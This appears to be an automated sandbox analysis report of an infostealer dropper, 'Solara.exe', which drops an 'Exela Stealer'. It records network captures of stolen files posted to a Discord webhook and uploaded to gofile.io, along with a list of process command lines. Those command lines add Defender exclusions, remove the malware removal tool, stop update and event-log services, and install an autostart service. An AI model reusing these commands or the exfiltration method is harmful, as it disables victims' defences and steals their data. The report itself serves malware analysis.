                                                                                                  Data Ascii: B<be+5<\_9R|wGo?Gmb>kf2k2wqitWpg[NV|vM^s?;RXgW7=5l11bka^%u[@6F=&cu:dU5u1ulo.bBI9LIpPK
                                                                                                  2025-01-12 06:11:32 UTC2OUTData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2025-01-12 06:11:32 UTC38OUTData Raw: 2d 2d 64 35 35 39 34 65 64 61 62 38 39 39 34 36 64 61 39 31 61 36 38 61 34 31 65 35 33 38 33 31 39 36 2d 2d 0d 0a
                                                                                                  Data Ascii: --d5594edab89946da91a68a41e5383196--
                                                                                                  2025-01-12 06:11:34 UTC449INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.27.1
                                                                                                  Date: Sun, 12 Jan 2025 06:11:34 GMT
                                                                                                  Content-Type: application/json
                                                                                                  Content-Length: 439
                                                                                                  Connection: close
                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                                                  Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
                                                                                                  2025-01-12 06:11:34 UTC439INData Raw: 7b 22 64 61 74 61 22 3a 7b 22 63 72 65 61 74 65 54 69 6d 65 22 3a 31 37 33 36 36 36 32 32 39 34 2c 22 64 6f 77 6e 6c 6f 61 64 50 61 67 65 22 3a 22 68 74 74 70 73 3a 2f 2f 67 6f 66 69 6c 65 2e 69 6f 2f 64 2f 59 6f 62 74 45 30 22 2c 22 67 75 65 73 74 54 6f 6b 65 6e 22 3a 22 73 77 61 41 43 4a 59 48 51 4f 77 6b 4d 73 58 38 64 4f 68 38 53 4e 59 32 41 73 59 6f 47 42 33 66 22 2c 22 69 64 22 3a 22 39 61 38 37 65 39 32 39 2d 30 39 63 32 2d 34 35 35 32 2d 38 38 64 37 2d 35 38 39 61 38 33 61 32 36 36 30 61 22 2c 22 6d 64 35 22 3a 22 32 32 64 65 36 39 61 64 33 38 34 38 62 62 39 38 33 65 33 31 31 35 34 39 36 61 62 65 34 37 34 66 22 2c 22 6d 69 6d 65 74 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 22 2c 22 6d 6f 64 54 69 6d 65 22 3a 31 37 33 36 36 36
                                                                                                  Data Ascii: {"data":{"createTime":1736662294,"downloadPage":"https://gofile.io/d/YobtE0","guestToken":"swaACJYHQOwkMsX8dOh8SNY2AsYoGB3f","id":"9a87e929-09c2-4552-88d7-589a83a2660a","md5":"22de69ad3848bb983e3115496abe474f","mimetype":"application/zip","modTime":173666


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  6192.168.2.749992162.159.134.2334432980C:\Users\user\AppData\Local\Temp\Exela.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-12 06:11:35 UTC281OUTPOST /api/webhooks/1320429670621118475/ZA2SDlHOyGg_8gIHOPb_StHSHJUvDXjQVsMohQrFJXzcZqXUB4PdHnGLRGgaGXchQyP9 HTTP/1.1
                                                                                                  Host: discordapp.com
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Python/3.10 aiohttp/3.11.11
                                                                                                  Content-Length: 419
                                                                                                  Content-Type: application/json
                                                                                                  2025-01-12 06:11:35 UTC419OUTData Raw: 7b 22 75 73 65 72 6e 61 6d 65 22 3a 20 22 45 78 65 6c 61 20 53 74 65 61 6c 65 72 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 2a 2a 2a 45 78 65 6c 61 20 53 74 65 61 6c 65 72 2a 2a 2a 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 2a 2a 2a 53 74 65 61 6c 65 64 20 46 69 6c 65 73 2a 2a 2a 22 2c 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 30 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 45 78 65 6c 61 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 71 75 69 63 61 78 64 2f 45 78 65 6c 61 2d 56 32 2e 30 22 7d 2c 20 22 74 68 75 6d 62
                                                                                                  Data Ascii: {"username": "Exela Stealer", "embeds": [{"title": "***Exela Stealer***", "description": "***Stealed Files***", "url": "https://t.me/ExelaStealer", "color": 0, "footer": {"text": "https://t.me/ExelaStealer | https://github.com/quicaxd/Exela-V2.0"}, "thumb
                                                                                                  2025-01-12 06:11:36 UTC1109INHTTP/1.1 204 No Content
                                                                                                  Date: Sun, 12 Jan 2025 06:11:36 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Connection: close
                                                                                                  Set-Cookie: __dcfduid=1465091ed0ac11efa2a502127856c73e; Expires=Fri, 11-Jan-2030 06:11:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                  strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                  x-ratelimit-limit: 5
                                                                                                  x-ratelimit-remaining: 4
                                                                                                  x-ratelimit-reset: 1736662296
                                                                                                  x-ratelimit-reset-after: 1
                                                                                                  via: 1.1 google
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2oS8yPWU96vVn8NMgrdPsPmD3avUBCG7SbrVlD5DQEcUcp%2FElyr9DPfiNDInuvJXypfaJXbyiF7DzX5kMOI4h5VSH2YE9z0wT3lvzByn9JCUR8aqesA9HllNLXZQ%2BhDw"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Set-Cookie: __sdcfduid=1465091ed0ac11efa2a502127856c73e4e4ca8f501534de89a75dc58d266d310b14ecab19f99a974acab6242bcb32ca7; Expires=Fri, 11-Jan-2030 06:11:36 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                  2025-01-12 06:11:36 UTC626INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 46 75 41 7a 50 4e 7a 73 4e 75 6d 46 46 41 75 6b 4d 69 4c 79 38 75 79 6b 6d 30 6e 62 74 42 46 7a 6d 5a 55 5a 43 4b 37 33 38 6a 34 2d 31 37 33 36 36 36 32 32 39 36 2d 31 2e 30 2e 31 2e 31 2d 78 30 31 4c 65 4b 70 41 62 68 5a 64 6c 64 6f 74 35 53 38 62 54 61 61 35 45 36 45 6c 79 4c 2e 64 75 2e 69 59 72 6d 68 69 55 38 74 6e 69 7a 38 69 6d 59 50 4a 4c 49 5f 4d 72 6b 5a 73 57 6f 68 75 30 6c 7a 71 6a 59 70 6f 68 46 67 46 54 4c 45 41 4a 38 70 49 79 77 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 53 75 6e 2c 20 31 32 2d 4a 61 6e 2d 32 35 20 30 36 3a 34 31 3a 33 36 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72
                                                                                                  Data Ascii: Set-Cookie: __cf_bm=FuAzPNzsNumFFAukMiLy8uykm0nbtBFzmZUZCK738j4-1736662296-1.0.1.1-x01LeKpAbhZdldot5S8bTaa5E6ElyL.du.iYrmhiU8tniz8imYPJLI_MrkZsWohu0lzqjYpohFgFTLEAJ8pIyw; path=/; expires=Sun, 12-Jan-25 06:41:36 GMT; domain=.discordapp.com; HttpOnly; Secur


                                                                                                  Statistics

                                                                                                  CPU Usage

                                                                                                  Click to jump to process

                                                                                                  Memory Usage

                                                                                                  Click to jump to process

                                                                                                  High Level Behavior Distribution

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Behavior

                                                                                                  Click to jump to process

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Target ID:0
                                                                                                  Start time:01:10:24
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                                                                                                  Imagebase:0x7ff7b4ee0000
                                                                                                  File size:55'320 bytes
                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:1
                                                                                                  Start time:01:10:24
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Users\user\Desktop\Solara.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Users\user\Desktop\Solara.exe"
                                                                                                  Imagebase:0xd10000
                                                                                                  File size:14'390'272 bytes
                                                                                                  MD5 hash:CC6D7A6B17FEBE201B7F7D26CE944C08
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:3
                                                                                                  Start time:01:10:27
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe'
                                                                                                  Imagebase:0x7ff741d30000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:4
                                                                                                  Start time:01:10:27
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:7
                                                                                                  Start time:01:10:38
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Users\user~1\AppData\Local\Temp\Solara.exe"
                                                                                                  Imagebase:0x7ff6284a0000
                                                                                                  File size:5'527'040 bytes
                                                                                                  MD5 hash:089094590DF5698B03A7428A5864ED33
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 83%, ReversingLabs
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:8
                                                                                                  Start time:01:10:39
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Exela.exe'
                                                                                                  Imagebase:0xa10000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:9
                                                                                                  Start time:01:10:39
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:10
                                                                                                  Start time:01:10:39
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                  Imagebase:0x7ff741d30000
                                                                                                  File size:452'608 bytes
                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:11
                                                                                                  Start time:01:10:40
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:12
                                                                                                  Start time:01:10:43
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                  Imagebase:0x7ff6051e0000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:13
                                                                                                  Start time:01:10:43
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:14
                                                                                                  Start time:01:10:43
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:15
                                                                                                  Start time:01:10:43
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:16
                                                                                                  Start time:01:10:43
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\wusa.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                  Imagebase:0x7ff6f90b0000
                                                                                                  File size:345'088 bytes
                                                                                                  MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:17
                                                                                                  Start time:01:10:43
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:18
                                                                                                  Start time:01:10:43
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:19
                                                                                                  Start time:01:10:43
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:20
                                                                                                  Start time:01:10:43
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:21
                                                                                                  Start time:01:10:43
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop bits
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:22
                                                                                                  Start time:01:10:43
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:23
                                                                                                  Start time:01:10:44
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:24
                                                                                                  Start time:01:10:44
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:25
                                                                                                  Start time:01:10:44
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                  Imagebase:0x7ff7b4d70000
                                                                                                  File size:96'256 bytes
                                                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:26
                                                                                                  Start time:01:10:44
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                  Imagebase:0x7ff7b4d70000
                                                                                                  File size:96'256 bytes
                                                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:27
                                                                                                  Start time:01:10:45
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:28
                                                                                                  Start time:01:10:45
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                  Imagebase:0x7ff7b4d70000
                                                                                                  File size:96'256 bytes
                                                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:29
                                                                                                  Start time:01:10:45
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:30
                                                                                                  Start time:01:10:45
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\powercfg.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                  Imagebase:0x7ff7b4d70000
                                                                                                  File size:96'256 bytes
                                                                                                  MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:31
                                                                                                  Start time:01:10:45
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:32
                                                                                                  Start time:01:10:45
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe delete "PGYNROQK"
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:33
                                                                                                  Start time:01:10:45
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:34
                                                                                                  Start time:01:10:45
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:35
                                                                                                  Start time:01:10:45
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe create "PGYNROQK" binpath= "C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe" start= "auto"
                                                                                                  Imagebase:0x7ff686210000
                                                                                                  File size:72'192 bytes
                                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:36
                                                                                                  Start time:01:10:45
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff75da10000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:37
                                                                                                  Start time:01:10:45
                                                                                                  Start date:12/01/2025
                                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\sc.exe stop eventlog
